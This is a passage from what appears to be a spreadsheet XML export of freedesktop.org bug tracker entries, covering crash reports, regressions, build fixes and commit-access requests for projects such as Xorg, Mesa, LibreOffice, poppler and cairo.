  </si>
  <si>
    <t>xmag infinite loop if untrusted</t>
  </si>
  <si>
    <t>Using OpenSSH v3.8p1 with ForwardX11Trusted = false (i.e. the remote client will 
be untrusted) give the command xmag (no arguments).  It has an infinite loop 
saying X error of failed request:  BadDrawable (invalid Pixmap or Window 
parameter) Major opcode of failed request:  67 (X_PolyRectangle).  (And it 
gives the resource ID failed serno and current serno.)  Most likely it is 
trying to draw its selection cursor.  No blame for running afoul of the security 
system but it should do it once and die not get an infinite loop.
    Please forgive me if I've identified the wrong component to complain about 
but a Google search suggested that xmag does exist as a subdir of xorg and 
there were no other xmag bugs that I could find.</t>
  </si>
  <si>
    <t>jimc</t>
  </si>
  <si>
    <t>DBUS-104547</t>
  </si>
  <si>
    <t>dbus server report sigsegv signal when server fire msg to client frequently</t>
  </si>
  <si>
    <t>Created attachment 136626
source code and stack file for sigsegv
I want to use Commonapi and dbus to implement ipcï¼Œ compents include the followings:
(1)CommonAPI_3.1.5 
(2)dbus-runtime
(3)dbus-1.8.20(not included by attachment)
all these compents are included in the attachment.
the attachment includes three document:
1.CommonAPI_3.1.5 source code
   compile method: 
     a.cd CommonAPI_3.1.5
     b.mkdir build
     c.cmake ..
     d.make.
2.common-api-dbus-runtime source code
   compole method:
     a. mkdir build and cd build
     b.export PKG_CONFIG_PATH=/home/mxnavi/dbus-1.8.20  (modify this according your Directory)
     c.cmake -DUSE_INSTALLED_COMMONAPI=OFF -DUSE_INSTALLED_DBUS=OFF ..
     d.make.
3.commonapi-project project directory
   compole method:
     a.mkdir build and cd build
     b. cmake ..
     c. make.
tips:
after download dbus-1.8.20ï¼Œ I did the following patch operator:
(1)patch -p1 &lt; ../common-api-dbus-runtime/src/dbus-patches/capi-dbus-add-send-with-reply-set-notify.patch
(2)patch -p1 &lt; ../common-api-dbus-runtime/src/dbus-patches/capi-dbus-add-support-for-custom-marshalling.patch
(3).patch -p1 &lt; ../common-api-dbus-runtime/src/dbus-patches/capi-dbus-correct-dbus-connection-block-pending-call.patch
after everything is done cd commonapi-project/build and then lauch program:
1. ./ReadDBService (fire msg to client)
2. ./ReadDBClient.  (receive msg from server)</t>
  </si>
  <si>
    <t>neu_qudong</t>
  </si>
  <si>
    <t>XORG-11222</t>
  </si>
  <si>
    <t>XGetMotionEvents got broken in codestyle commit</t>
  </si>
  <si>
    <t>The XGetMotionEvents prototype has been wrongly modified in commit a48386ce6b5f8fd2d9dc11a966c9bf5da59f3831 the argument orders does not match the prototype from Xlib.h anymore.</t>
  </si>
  <si>
    <t>DRI-76580</t>
  </si>
  <si>
    <t>[Bisected]igt/drv_suspend aborted</t>
  </si>
  <si>
    <t>Created attachment 96339
dmesg
System Environment:
--------------------------
Platform: Haswell
Kernel: drm-intel-fixes/0f4706d2740f2a221cd502922b22e522009041d9
Bug detailed description:
-----------------------------
It fails on all platforms with igt master branch.
Bisect shows: a388f3b98f039403a4583748db980d4a44dd6748 is the first bad commit.
commit a388f3b98f039403a4583748db980d4a44dd6748
Author:     Daniel Vetter 
AuthorDate: Sat Mar 22 13:22:11 2014 +0100
Commit:     Daniel Vetter 
CommitDate: Sat Mar 22 14:28:03 2014 +0100
    lib: allow igt_skip_on_simulation outside of fixtures.
    Thomas noticed that in simulation mode a lot of the tests fall over
    instead of skipping properly. This is due to recently added
    self-checks which ensure that any call to igt_skip happens either
    within a fixture or subtest block (or it's a simple test without
    subtests). This is to catch bugs since pretty much always not wrapping
    up hardware setup and checks into these blocks is a bug.
    Bug simulation skipping is a bit different so allow that exception.
    Otherwise we'd need to fix up piles of tests (and likely need to play
    a game of whack-a-mole).
    Also add a library testcase for all the different variants to make
    sure it really works.
    Cc: Thomas Wood 
    Cc: Ben Widawsky 
    Signed-off-by: Daniel Vetter 
run ./drv_suspend --run-subtest debugfs-reader
output:
IGT-Version: 1.6-g7a81094 (x86_64) (Linux: 3.14.0-rc5_drm-intel-fixes_0f4706_20140323+ x86_64)
rtcwake: wakeup from mem using /dev/rtc0 at Tue Mar 25 18:05:04 2014
Subtest debugfs-reader: SUCCESS
drv_suspend: igt_core.c:624: igt_fail: Assertion `!test_with_subtests || in_fixture' failed.
Aborted (core dumped)</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7731</t>
  </si>
  <si>
    <t>Request for cvs access to mesa</t>
  </si>
  <si>
    <t>I have contributed the glfbdevglut code that I need to improve.
Account:
Sean D'Epagnier (geckosenator) sean@depagnier.com</t>
  </si>
  <si>
    <t>TELEPATHY-28682</t>
  </si>
  <si>
    <t>Fetch Account property each time we receive a message</t>
  </si>
  <si>
    <t>Each time a message is logged a new TpAccount is created and to the Account property are fetched by tp-glib. We should reuse the existing TpAccount instead.</t>
  </si>
  <si>
    <t>LIBREOFFICE-51196</t>
  </si>
  <si>
    <t>Presenter screen doesn't work at all (REGRESSION)</t>
  </si>
  <si>
    <t>Since 3.5.x the presenter screen in Impress doesn't work at all.
Only the presentation is displayed on the selected screen in slideshow parameters.
On the other screen the normal desktop is showed.
Tested on MacOS 10.7.3 :
LibreOffice 3.4.6 : OK
LibreOffice 3.5.4 : Not OK
LibreOffice 3.6beta1 : Not OK</t>
  </si>
  <si>
    <t>XORG-25071</t>
  </si>
  <si>
    <t>GPU lockup G80 8800</t>
  </si>
  <si>
    <t>Created attachment 31169
dmesg
Im getting a GPU lockup during boot when using latest git module built into the kernel with drm-next and drm.git with latest ddx driver. The card is a G80 (nv50) 8800 GTS 640mb ram. Ive attached complete dmesg nvclock -i.</t>
  </si>
  <si>
    <t>c.bannister</t>
  </si>
  <si>
    <t>DRI-76670</t>
  </si>
  <si>
    <t>[IVB/HSW Bisected]igt/gen7_forcewake_mt fails</t>
  </si>
  <si>
    <t>Created attachment 96437
dmesg
System Environment:
--------------------------
Platform: Ivybridge
Kernel:  drm-intel-nightly/07071a9d41aed59f4f2ba66afb82ec35557a80c1
Bug detailed description:
-----------------------------
It fails on Ivybridge and haswell with -queued and -nightly kernel.
Bisect shows: 6d42f94084b8c69813d7ecd0466c33fe561bf127 is the first bad commit
commit 6d42f94084b8c69813d7ecd0466c33fe561bf127
Author:     Brad Volkin 
AuthorDate: Tue Feb 18 10:15:57 2014 -0800
Commit:     Daniel Vetter 
CommitDate: Tue Mar 25 14:11:39 2014 +0100
    drm/i915: Enable command parsing by default
    v2: rebased
    OTC-Tracker: AXIA-4631
    Change-Id: I6747457e1fe7494bd42787af51198fcba398ad78
    Signed-off-by: Brad Volkin 
    Reviewed-by: Jani Nikula 
    [danvet: Resolve tiny conflict in module option text.]
    Signed-off-by: Daniel Vetter 
output:
IGT-Version: 1.6-gc819014 (x86_64) (Linux: 3.14.0-rc7_drm-intel-nightly_07071a_20140326+ x86_64)
Test assertion failure function gem_execbuf file ioctl_wrappers.c:396:
Last errno: 22 Invalid argument
Failed assertion: ret == 0
Reproduce steps:
----------------------------
1. ./gen7_forcewake_mt</t>
  </si>
  <si>
    <t>bradley.d.volkin</t>
  </si>
  <si>
    <t>LIBREOFFICE-40320</t>
  </si>
  <si>
    <t>Pie charts colors messed up when saving opening Excel (.xls) documents</t>
  </si>
  <si>
    <t>Created attachment 50504
Side by side comparison of original pie charts and the way they show up when the .xls file is reopened
I have made some charts in a spreadsheet in LO 3.3.2 and saved the file in .xls format. After I installed LO 3.4.2 the pie charts load with the same colour in all the regions. After I change the colours again and save the file when I open the saved file the colours become messed up again (only one colour for all regions). The same thing happens if I try to insert the file as an OLE object in Writer. I'm attaching a .pdf file comparing the way the charts looked just before I closed the spreadsheet and afterwards.</t>
  </si>
  <si>
    <t>3b2005</t>
  </si>
  <si>
    <t>POPPLER-14450</t>
  </si>
  <si>
    <t>Repeated images not appearing in pdfs</t>
  </si>
  <si>
    <t>Reported in Launchpad:
=====
https://launchpad.net/bugs/190698
Ubuntu 7.10
Evince 2.20.1-0ubuntu1
I have a pdf file with a flyer on it generated by OpenOffice draw. The flyer appears 4 times on the A4 page.
The top two copies of the flyer correctly show the church logo in the bottom-right corner.
The bottom two copies of the flyer are missing the logo (I have other versions where the logo appears but is corrupted).
The pdf displays correctly using Adobe Reader 8.0.
=====
I can confirm.</t>
  </si>
  <si>
    <t>greg.grossmeier</t>
  </si>
  <si>
    <t>MESA-25355</t>
  </si>
  <si>
    <t>sauerbraten segfaults after 63c00c53a3019b801c5eee8a12f7862422f79f10</t>
  </si>
  <si>
    <t>Created attachment 31575
sauerbraten gdb backtrace
Since this commit sauerbraten crashes when loading every map. Backtrace is attached. Using current mesa_7_7_branch without KMS with:
GL_RENDERER   = Mesa DRI R300 (RV530 71C5) 20090101 x86/MMX/SSE2 TCL
63c00c53a3019b801c5eee8a12f7862422f79f10 is first bad commit
commit 63c00c53a3019b801c5eee8a12f7862422f79f10
Author: Maciej Cencora 
Date:   Sun Nov 29 15:40:13 2009 +0100
    radeon: update miptree code a little
    Simplify gl image level  miptree level mapping (are equal now).
    Don't allocate miptree for images that won't fit in it (fixes #25230).
:040000 040000 6a0ace3925115784b57071e132af539d1e0c3536 5cdd6fd66a93b76ffc55386fb5fcd1c506be87d8 M	src</t>
  </si>
  <si>
    <t>NICE-24758</t>
  </si>
  <si>
    <t>[PATCH] build fix for libnice-0.0.9 on FreeBSD</t>
  </si>
  <si>
    <t>Created attachment 30744
fix
Some files use sockaddr_in which is specified by POSIX [1] to be defined by netinet/in.h. Add the missing includes in files that use it.
[1] http://www.opengroup.org/onlinepubs/009695399/basedefs/netinet/in.h.html</t>
  </si>
  <si>
    <t>aballier</t>
  </si>
  <si>
    <t>LIBREOFFICE-68186</t>
  </si>
  <si>
    <t>UI: Selecting the first subset while inserting a Special Character the last subset is selected</t>
  </si>
  <si>
    <t>How to reproduce:
- Choose Insert -&gt; Special Character
- In the Special Character choose any subset in the drop-down list
- Then choose the first subset in the drop-down list
Expected behaviour: 
The first characters in the font are shown
Actual behaviour:
The very last character in the font is selected.
Changing the selected font makes no difference.
Tested in: LO Version: 4.2.0.0.alpha0+
Build ID: f10f5ca011c3d06d3470b9e21bda13d505cfe93e
on openSuSE 11.4 (64-bit)</t>
  </si>
  <si>
    <t>XCB-10755</t>
  </si>
  <si>
    <t>Add xcb group to account mhopf</t>
  </si>
  <si>
    <t>I have some fixes for XCB and also as I mentor a VoC student in that area it'd probably good if I had commit rights for these git repositories :) Nontrivial changes will be discussed on the mailing list first of course.
So is anybody willing to add me to the xcb group on annarchy/git? ssh keys shouldn't be changed. Username on annarchy is mhopf.</t>
  </si>
  <si>
    <t>PACKAGEKIT-72482</t>
  </si>
  <si>
    <t>gtk-doc: DOC_SOURCE_DIR is relative to builddir</t>
  </si>
  <si>
    <t>Created attachment 90464
gtk-doc: DOC_SOURCE_DIR is relative to builddir
when source dir ! builddir  we fail to parse all the non generated sources . gtk-doc DOC_SOURCE_DIR is from current dir here build dir. The patch prepend the absolute source dir.
Mind generated pk-enum-types.c/.h is not parsed anymore we might want to include both static source files and generated sources files (then we should add the non prepended source directory too).</t>
  </si>
  <si>
    <t>TELEPATHY-17354</t>
  </si>
  <si>
    <t>Emits Send immediately even if the message is queued</t>
  </si>
  <si>
    <t>When you send a message with Idle as long as the recipient and message type are valid Sent will be emitted immediately.  However the message might not actually be sent by the time Sent is emitted if it has been split into multiple parts for length reasons it will never have all been sent by the time Sent is emitted.
The signal emission should be delayed until the message is fully sent.</t>
  </si>
  <si>
    <t>XORG-2500</t>
  </si>
  <si>
    <t>i830 dualhead + power management calls = unknown exception</t>
  </si>
  <si>
    <t>On my Panasonic R1N laptop (uses an i830 chip) mplayer causes an unhandled
exception to be logged by the X server. This is the result (apparently) of a
general protection fault handled by the linux int10 module due to a BIOS call to
handle power management while the video overlay is active.</t>
  </si>
  <si>
    <t>dbronaugh</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-14910</t>
  </si>
  <si>
    <t>Account request for hal-info commit access</t>
  </si>
  <si>
    <t>As per Richard Hughes' prodding me on this can I get an account for commit access to the hal-info repository?
Real Name: Carlos Corbacho
E-Mail Address: carlos@strangeworlds.co.uk
Preferred Account Name: cathectic</t>
  </si>
  <si>
    <t>carlos</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-99328</t>
  </si>
  <si>
    <t>endianness issue in application/x-java-keystore magic</t>
  </si>
  <si>
    <t>Created attachment 128821
freedesktop.org.xml.in.diff
The magic for application/x-java-keystore says
And the test file test.jks starts with 0xFE 0xED 0xFE 0xED.
On a little-endian machine this leads to a value of 0xedfeedfe when read as a single 32-bit value.
http://mindprod.com/jgloss/cacerts.html says The first four signature bytes of a Sun cacerts file in hex are FEEDFEED. so I think this rule should say big32 instead of host32. With big32 both the s-m-i testsuite and my implementation (which uses the same testsuite) pass.
Please review.</t>
  </si>
  <si>
    <t>XORG-13224</t>
  </si>
  <si>
    <t>text corruption with bitmap fonts</t>
  </si>
  <si>
    <t>Using:
xorg-x11-server-Xorg-1.4.99.1-0.8.fc9
xorg-x11-drv-i810-2.1.99-0.fc9
text is randomly corrupted. Screenshot to be attached.</t>
  </si>
  <si>
    <t>XORG-606</t>
  </si>
  <si>
    <t>[XKB] Error activating XKB configuration.</t>
  </si>
  <si>
    <t>I received this error upon login. Unfortunately I do not know how to provide the
information that the error message requested.
Error activating XKB configuration.
Probably internal X server problem.
X server version data:
The X.Org Foundation
60700000
If you report this situation as a bug please include:
- The result of xprop -root | grep XKB
- The result of gconftool-2 -R /desktop/gnome/peripherals/keyboard/xkb</t>
  </si>
  <si>
    <t>gregtoombs</t>
  </si>
  <si>
    <t>CAIRO-105019</t>
  </si>
  <si>
    <t>Make it possible to create links in PDF</t>
  </si>
  <si>
    <t>In librsvg we have a request to make it possible for SVG's  element to create the corresponding link in PDF output.
I have no experience at all with the actual PDF format but from what I could understand in the spec one creates links relative to a rectangular region not to arbitrary objects.  I don't know if this is correct.
Would it be possible to have some API that only goes to the PDF surface so that one could create links?
cairo_pdf_surface_create_link(surf x y w h url) - something like that?</t>
  </si>
  <si>
    <t>CAIRO-14457</t>
  </si>
  <si>
    <t>Image format not supported</t>
  </si>
  <si>
    <t>Error: Cairo 1.5.8 does not yet support the requested image format:
        Depth: 8
        Alpha mask: 0x00000000
        Red   mask: 0x00000000
        Green mask: 0x00000000
        Blue  mask: 0x00000000
Please file an enhancement request (quoting the above) at:
http://bugs.freedesktop.org/enter_bug.cgi?product=cairo
Assertion failed: NOT_REACHED file cairo-image-surface.c line 220
Abort(coredump)</t>
  </si>
  <si>
    <t>gabriel.climescu</t>
  </si>
  <si>
    <t>LIBREOFFICE-41888</t>
  </si>
  <si>
    <t>[FORMATTING] Shapes move on opening file</t>
  </si>
  <si>
    <t>I'll attach a presentation with two slides
On the first one some shapes on top of a picture
On the second one a picture with how it looks like when open in 3.4.3 and when opened in build from master
(I opened in Build ID: 4456143-f6a1fc5-e1a2fb3 )
When I place the shapes correct in the masterbuild they still are in the correct position when I open in 3.4.3.
So the problem is on opening in Master.
Seen the same problem in more presentations (e.g. the one from Petr on releasing).</t>
  </si>
  <si>
    <t>XORG-4690</t>
  </si>
  <si>
    <t>xorg won't start - mtrr patch problem</t>
  </si>
  <si>
    <t>I am using Gentoo.  This problem started when I upgraded from xorg-x11-6.8.2-r1
to xorg-x11-6.8.2-r2.  After upgrading X would not start.  The boot process ran
without error and then started xdm.  The screen then went blank - there is no
keyboard response and no mouse response.  In this state I cannot ssh to the
machine.  When I reboot /var/log/Xorg.0.log shows no errors and stops at
different places.  Looking at the ebuilds it looks like different patch sets
were used between r1 and later releases.  So far I've compiled r2 r3 r4 and
xorg-x11-6.8.99.15-r1.  All produce the same result.  
I'm not sure how much spec I need to give but my video card (from lspci):
I have been working with the gentoo devs and have tracked the issue down to a
couple of patches in the gentoo ebuild.  Here is a reference to the Gentoo
bugreport:
http://bugs.gentoo.org/show_bug.cgi?id=106871
and I understand that this is the upstream bug which lead to the original
patches that are causing the problem:
https://bugs.freedesktop.org/show_bug.cgi?id=2750</t>
  </si>
  <si>
    <t>matt-lists</t>
  </si>
  <si>
    <t>POPPLER-67295</t>
  </si>
  <si>
    <t>SIGTRAP - Trace/Breakpoint - evince crashes opening pdf</t>
  </si>
  <si>
    <t>Created attachment 82988
this pdf document crashes evince.
evince crashes on attached pdf. 
the backtrace tells it is in evince. but ther is a function in poppler that does not read the page number properly.
poppler/poppler/Catalog.cc
int Catalog::getNumPages()
if the page number exeeds int range the type cast from double produces this error
#0  g_logv (log_domain=0x7ffff578728e GLib log_level=G_LOG_LEVEL_ERROR format= args=args@entry=0x7fffffffd3d8) at gmessages.c:981
#1  0x00007ffff57255d2 in g_log (log_domain=log_domain@entry=0x7ffff578728e GLib log_level=log_level@entry=G_LOG_LEVEL_ERROR format=format@entry=0x7ffff5790618 %s: overflow allocating %lu*%lu bytes) at gmessages.c:1010
#2  0x00007ffff57240a1 in g_malloc0_n (n_blocks=n_blocks@entry=18446744071562067969 n_block_bytes=n_block_bytes@entry=8) at gmem.c:365
#3  0x00007ffff755fa8e in ev_view_build_height_to_page_cache (view=view@entry=0x9e6160 cache=cache@entry=0xa72950) at ev-view.c:321
#4  0x00007ffff75688c0 in ev_view_get_height_to_page_cache (view=0x9e6160) at ev-view.c:417
#5  setup_caches (view=0x9e6160) at ev-view.c:5170
#6  ev_view_document_changed_cb (model=0x76d460 pspec= view=0x9e6160) at ev-view.c:5340
#7  0x00007ffff5a0c2a0 in g_closure_invoke (closure=0x9e5420 return_value=0x0 n_param_values=2 param_values=0x7fffffffd760 invocation_hint=0x7fffffffd700) at gclosure.c:777
#8  0x00007ffff5a1f120 in signal_emit_unlocked_R (node=node@entry=0x67b0b0 detail=detail@entry=1029 instance=instance@entry=0x76d460 emission_return=emission_return@entry=0x0 instance_and_params=instance_and_params@entry=0x7fffffffd760) at gsignal.c:3584
#9  0x00007ffff5a2730d in g_signal_emit_valist (instance=0x76d460 signal_id= detail=1029 var_args=var_args@entry=0x7fffffffd9b8) at gsignal.c:3328
#10 0x00007ffff5a27592 in g_signal_emit (instance= signal_id= detail=) at gsignal.c:3384
#11 0x00007ffff5a10d85 in g_object_dispatch_properties_changed (object=0x76d460 n_pspecs=1 pspecs=0x0) at gobject.c:1042
#12 0x00007ffff5a1344b in g_object_notify_by_spec_internal (pspec=0x758ed0 object=0x76d460) at gobject.c:1136
#13 g_object_notify (object=0x76d460 property_name=property_name@entry=0x7ffff756fc1c document) at gobject.c:1178
#14 0x00007ffff754f9a5 in ev_document_model_set_document (model= document=document@entry=0x756f00) at ev-document-model.c:381
#15 0x0000000000433a80 in ev_window_load_job_cb (job=0xa03320 data=) at ev-window.c:1607
#16 0x00007ffff5a0c567 in _g_closure_invoke_va (closure=0xa0b2f0 return_value=0x0 instance=0xa03320 args=0x7fffffffddf8 n_params=0 param_types=0x0) at gclosure.c:840
#17 0x00007ffff5a26d1b in g_signal_emit_valist (instance=0xa03320 signal_id= detail=0 var_args=var_args@entry=0x7fffffffddf8) at gsignal.c:3234
#18 0x00007ffff5a27592 in g_signal_emit (instance= signal_id= detail=detail@entry=0) at gsignal.c:3384
#19 0x00007ffff7550da3 in emit_finished (job=) at ev-jobs.c:180
#20 emit_finished (job=) at ev-jobs.c:170
#21 0x00007ffff571e015 in g_main_dispatch (context=0x6ad190) at gmain.c:3058
#22 g_main_context_dispatch (context=context@entry=0x6ad190) at gmain.c:3634
#23 0x00007ffff571e358 in g_main_context_iterate (context=context@entry=0x6ad190 block=block@entry=1 dispatch=dispatch@entry=1 self=) at gmain.c:3705
#24 0x00007ffff571e414 in g_main_context_iteration (context=0x6ad190 context@entry=0x0 may_block=may_block@entry=1) at gmain.c:3766
#25 0x00007ffff5cf34bc in g_application_run (application=0x6d14b0 argc=argc@entry=0 argv=argv@entry=0x0) at gapplication.c:1624
#26 0x000000000041c46b in main (argc=1 argv=0x7fffffffe198) at main.c:332</t>
  </si>
  <si>
    <t>hoffmeister.pierre</t>
  </si>
  <si>
    <t>RARIAN-11976</t>
  </si>
  <si>
    <t>rarian-example bus error</t>
  </si>
  <si>
    <t>Built rarian-0.5.6 on OS X 10.3 (gcc3.3) with the patch from Bug #11799 applied. Running rarian-example gives a bus error. Here's the OS X CrashLog:
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000003
Thread 0 Crashed:
0   libSystem.B.dylib   0x90007250 strlen + 0x50
1   libSystem.B.dylib   0x900047a0 __vfprintf + 0x1470
2   libSystem.B.dylib   0x90007390 sprintf + 0xb0
3   librarian.0.dylib   0x00072738 process_check_file + 0x5dc (rarian-info.c:340
)
4   librarian.0.dylib   0x00072a60 process_info_dir + 0x158 (rarian-info.c:436)
5   librarian.0.dylib   0x00072cc8 rrn_info_init + 0x88 (rarian-info.c:535)
6   librarian.0.dylib   0x00072d40 rrn_info_get_categories + 0x30 (rarian-info.c
:556)
7   rarian-example      0x00002c50 main + 0x1c (rarian-example.c:108)
8   rarian-example      0x0000250c _start + 0x188 (crt.c:267)
9   dyld                0x8fe1a31c _dyld_start + 0x64
PPC Thread State:
  srr0: 0x90007250 srr1: 0x0000f030                vrsave: 0x00000000
    cr: 0x44000248  xer: 0x00000004   lr: 0x900047a0  ctr: 0x90007200
    r0: 0x900047a0   r1: 0xbfffe690   r2: 0x90003610   r3: 0x00000003
    r4: 0x00000003   r5: 0x00000007   r6: 0x0000006f   r7: 0x00000003
    r8: 0x6e666f00   r9: 0x00000003  r10: 0x00082630  r11: 0xa0004134
   r12: 0x90007200  r13: 0x00000007  r14: 0x00000017  r15: 0xffffffff
   r16: 0xbfffed80  r17: 0x00000000  r18: 0x00000073  r19: 0xbfffe718
   r20: 0x00000007  r21: 0x00000004  r22: 0x00000007  r23: 0xfffffff9
   r24: 0xbfffee9c  r25: 0x00000000  r26: 0x00000003  r27: 0xbfffee20
   r28: 0x00000000  r29: 0x00000001  r30: 0x00000004  r31: 0x90003338
And here's the gdb:
Reading symbols for shared libraries ... done
(gdb) run
Starting program: /sw/bin/rarian-example 
Reading symbols for shared libraries +. done
Program received signal EXC_BAD_ACCESS Could not access memory.
0x90007250 in strlen ()
(gdb) backtrace
#0  0x90007250 in strlen ()
#1  0x900047a0 in __vfprintf ()
#2  0x90007390 in sprintf ()
#3  0x00072738 in process_check_file () at rarian-info.c:338
#4  0x00072a60 in process_info_dir (dir=0x1c ) at rarian-info.c:436
#5  0x00072cc8 in rrn_info_init () at rarian-info.c:534
#6  0x00072d40 in rrn_info_get_categories () at rarian-info.c:556
#7  0x00002c50 in main (argc=3 argv=0x3) at rarian-example.c:96
(gdb) quit</t>
  </si>
  <si>
    <t>MESA-23561</t>
  </si>
  <si>
    <t>glxgears fails on rs480 with r300g driver</t>
  </si>
  <si>
    <t>Created attachment 28956
gdb backtrace
glxgears fails on rs480 with r300g driver and prints Floating point exception.</t>
  </si>
  <si>
    <t>andrius</t>
  </si>
  <si>
    <t>CAIRO-10531</t>
  </si>
  <si>
    <t>quartz backend</t>
  </si>
  <si>
    <t>cairo nquartz backend floating point precision issues</t>
  </si>
  <si>
    <t>Just tracking downstream bug/patch:
https://bugzilla.mozilla.org/show_bug.cgi?id=374006
...if the string is long enough this [rounding] error actually
changes the subpixel rendering of the glyphs at the end of the string.
I've tested Roc's patch it makes zero difference to any of cairo's test cases but we don't have any long enough lines of text.
Its a straightforward fix we should push this for 1.4.4.</t>
  </si>
  <si>
    <t>XORG-81278</t>
  </si>
  <si>
    <t>Click and drag behavior is incorrect on synaptics clickpad</t>
  </si>
  <si>
    <t>Created attachment 102684
xorg log
On a Dell Inspiron 15 7000 series laptop with clickpad. Clicking and dragging is almost impossible because as soon as the dragging finger is lifted the cursor jumps a long distance toward the location of the clicking finger. This usually results in any attempt to click and drag jumping to the bottom left corner of the screen.
As a workaround I tried to set AreaBottomEdge to ignore the area in which I usually click. This workaround fails because AreaBottomEdge does not ignore input in the following two cases:
1) When a finger is dragged from outside of the excluded area into the excluded area the movement doesn't always stop (sometimes it just slows sometimes it stops after some activity in the excluded area)
2) And more importantly when clicking to drag as soon as the dragging finger touches the pad then input events are sent from the clicking finger even if it is within the zone excluded by AreaBottomEdge.
So it seems to me that there are two incorrect behaviors here. First is that AreaBottomEdge does not exclude movement input in all cases. The second is that click and drag behavior does not keep movement from different points on the pad mapped to the location of the dragging cursor. For example the behavior of the Windows driver is two allow both the clicking and the dragging finger to move the pointer but the pointer never jumps regardless of which finger is lifted off of the pad during a drag.</t>
  </si>
  <si>
    <t>amorsillo</t>
  </si>
  <si>
    <t>POPPLER-12016</t>
  </si>
  <si>
    <t>leftover debug spew</t>
  </si>
  <si>
    <t>in 0.5.91</t>
  </si>
  <si>
    <t>MESA-106180</t>
  </si>
  <si>
    <t>[bisected] radv vulkan smoke test black screen (Add support for DRI3 v1.2)</t>
  </si>
  <si>
    <t>When doing smoketest with radv driver the window is black.
bisected:
git bisect bad
c80c08e226033e9e33abdca43e02e7f8c845ae0a is the first bad commit
commit c80c08e226033e9e33abdca43e02e7f8c845ae0a
Author: Daniel Stone 
Date:   Thu Jun 8 17:24:30 2017 +0100
    vulkan/wsi/x11: Add support for DRI3 v1.2
    Adds support for multiple planes and buffer modifiers.
    v4: Rename has_dri3_v1_1 to has_dri3_modifiers
    v12: Multi-planar/modifier support is now DRI3 v1.2 also update release
         versions
:100644 100644 40e7855994a6e76d744f192694d5060d39327d56 f84903dffebf39694f458d267793e39a03a0cf8d M      configure.ac
:100644 100644 7658f6e63dae57920fd74a9e445efb07018fd227 34090de45257ea468474af8697760900feb1f341 M      meson.build
:040000 040000 14486094f3e8b9102b67a608d31ea5bf43ee5627 4a42c1f98bcdb9b0c95020cc759565f412d77bf7 M      src
Configuration:
distro: gentoo
PRIME configuration with intel haswell and amd radeon m265x
uname -a
Linux localhost.localdomain 4.14.35-gentoo #1 SMP PREEMPT Sun Apr 22 12:00:39 CEST 2018 x86_64 Intel(R) Core(TM) i7-4720HQ CPU @ 2.60GHz GenuineIntel GNU/Linux
important lines of lspci:
00:02.0 VGA compatible controller [0300]: Intel Corporation 4th Gen Core Processor Integrated Graphics Controller [8086:0416] (rev 06)
01:00.0 Display controller [0380]: Advanced Micro Devices Inc. [AMD/ATI] Venus PRO [Radeon HD 8850M / R9 M265X] [1002:6823]
dependencies installed:
   `--  dev-libs/expat-2.2.5
   `--  sys-libs/zlib-1.2.11-r1
   `--  x11-libs/libX11-1.6.5
   `--  x11-libs/libxshmfence-1.2
   `--  x11-libs/libXdamage-1.1.4-r1
   `--  x11-libs/libXext-1.3.3
   `--  x11-libs/libXxf86vm-1.1.4
   `--  x11-libs/libxcb-1.13
   `--  x11-libs/libXfixes-5.0.3
   `--  sys-libs/libunwind-1.2.1
   `--  virtual/libelf-3
   `--  dev-libs/libclc-0.2.0_pre20170929
   `--  media-libs/libomxil-bellagio-0.9.3
   `--  x11-misc/xdg-utils-1.1.1-r1
   `--  x11-libs/libva-1.7.3
   `--  x11-libs/libvdpau-1.1.1
   `--  dev-libs/wayland-1.13.0
   `--  dev-libs/wayland-protocols-1.11
   `--  x11-libs/libXvMC-1.0.10
   `--  x11-libs/libdrm-2.4.91
   `--  sys-devel/llvm-6.0.0
   `--  dev-lang/python-2.7.14-r1
   `--  sys-devel/gcc-6.4.0-r1
   `--  sys-devel/gettext-0.19.8.1
   `--  virtual/pkgconfig-0-r1
   `--  dev-util/valgrind-3.13.0
   `--  x11-proto/dri2proto-2.8-r2
   `--  x11-proto/dri3proto-1.0-r1
   `--  x11-proto/presentproto-1.1-r1
   `--  x11-proto/glproto-1.4.17-r2
   `--  x11-proto/xextproto-7.3.0-r1
   `--  x11-proto/xf86driproto-2.1.1-r2
   `--  x11-proto/xf86vidmodeproto-2.3.1-r2
   `--  dev-python/mako-1.0.6
   `--  app-portage/elt-patches-20170815
   `--  sys-devel/automake-1.15.1-r2
   `--  sys-devel/autoconf-2.69-r4
   `--  sys-devel/libtool-2.4.6-r3</t>
  </si>
  <si>
    <t>mercuriete</t>
  </si>
  <si>
    <t>MESA-29632</t>
  </si>
  <si>
    <t>[softpipe] piglit bgra-sec-color-pointer regression</t>
  </si>
  <si>
    <t>mesa: 02e16398292825924d4c7ffb884961275dbadacd (master)
piglit bgra-sec-color-pointer not hits a segmentation fault but previously passed.
$ ./bin/bgra-sec-color-pointer
Program received signal SIGSEGV Segmentation fault.
0x00b61c76 in ?? ()
(gdb) bt
#0  0x00b61c76 in ?? ()
Cannot access memory at address 0x8</t>
  </si>
  <si>
    <t>luca.barbieri</t>
  </si>
  <si>
    <t>LIBSPECTRE-15127</t>
  </si>
  <si>
    <t>No vasprintf on Microsoft Windows</t>
  </si>
  <si>
    <t>I'm currently trying to compile libspectre on Microsoft Windows using a MinGw/msys based build environment. After a bit of a struggle with libgs (as usual almost all the development stuff has been neglected from the installer) configure did finish.
The build ran smoothly until:
spectre-utils.c: In function `spectre_strdup_vprintf':
spectre-utils.c:152: implicit declaration of function `vasprintf'
There are a few replacements for vasprintf out there which could probably be used. How does libspectre prefer to handle platform-specific stuff?</t>
  </si>
  <si>
    <t>schumaml</t>
  </si>
  <si>
    <t>CAIRO-7963</t>
  </si>
  <si>
    <t>cleanups for warnings from sparse/gcc</t>
  </si>
  <si>
    <t>Here's another batch of cleanups for cairo.</t>
  </si>
  <si>
    <t>XORG-4902</t>
  </si>
  <si>
    <t>libXfixes:  pointer targets in passing argument 2 of '_XRead32' differ in signedness</t>
  </si>
  <si>
    <t>x86_64-redhat-linux-gcc -DHAVE_CONFIG_H -I. -I. -I..
-I../include/X11/extensions -O2 -g -pipe -Wall -Wp-D_FORTIFY_SOURCE=2
-fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=nocona -MT
Cursor.lo -MD -MP -MF .deps/Cursor.Tpo -c Cursor.c  -fPIC -o .libs/Cursor.o
